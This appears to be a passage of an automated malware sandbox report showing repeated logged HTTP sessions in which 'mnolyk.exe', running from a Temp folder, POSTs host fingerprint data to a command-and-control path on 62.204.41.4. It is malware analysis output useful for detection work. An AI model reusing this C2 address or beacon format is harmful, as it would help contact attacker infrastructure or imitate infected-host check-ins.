                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:11.950310946 CET378INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      264192.168.2.74995962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:12.184454918 CET379OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:12.247689962 CET379INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      265192.168.2.74996062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:12.428216934 CET380OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:12.492048979 CET380INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      266192.168.2.74996162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:12.685374975 CET381OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:12.749408007 CET381INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      267192.168.2.74996262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:12.926371098 CET382OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:12.989113092 CET382INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      268192.168.2.74996362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:13.161472082 CET383OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:13.224231958 CET383INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      269192.168.2.74996462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:13.400471926 CET384OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:13.463514090 CET384INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      27192.168.2.74972162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:08.117511988 CET131OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:08.181422949 CET131INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      270192.168.2.74996562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:13.650115967 CET385OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:13.712537050 CET385INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      271192.168.2.74996662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:13.888623953 CET386OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:13.951494932 CET386INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      272192.168.2.74996762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:14.132869005 CET387OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:14.195507050 CET387INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      273192.168.2.74996862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:14.393779039 CET388OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:14.456599951 CET388INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      274192.168.2.74996962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:14.885714054 CET389OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:14.949523926 CET389INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      275192.168.2.74997062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:15.189928055 CET390OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:15.255315065 CET390INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      276192.168.2.74997162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:15.502675056 CET391OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:15.565202951 CET391INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      277192.168.2.74997262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:16.388087034 CET392OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:16.450793028 CET392INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      278192.168.2.74997362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:16.792891026 CET393OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:16.857755899 CET393INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      279192.168.2.74997462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:17.631578922 CET394OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:17.696517944 CET394INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      28192.168.2.74972262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:08.360518932 CET132OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:08.425359964 CET132INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      280192.168.2.74997562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:18.409780025 CET395OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:18.474836111 CET395INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
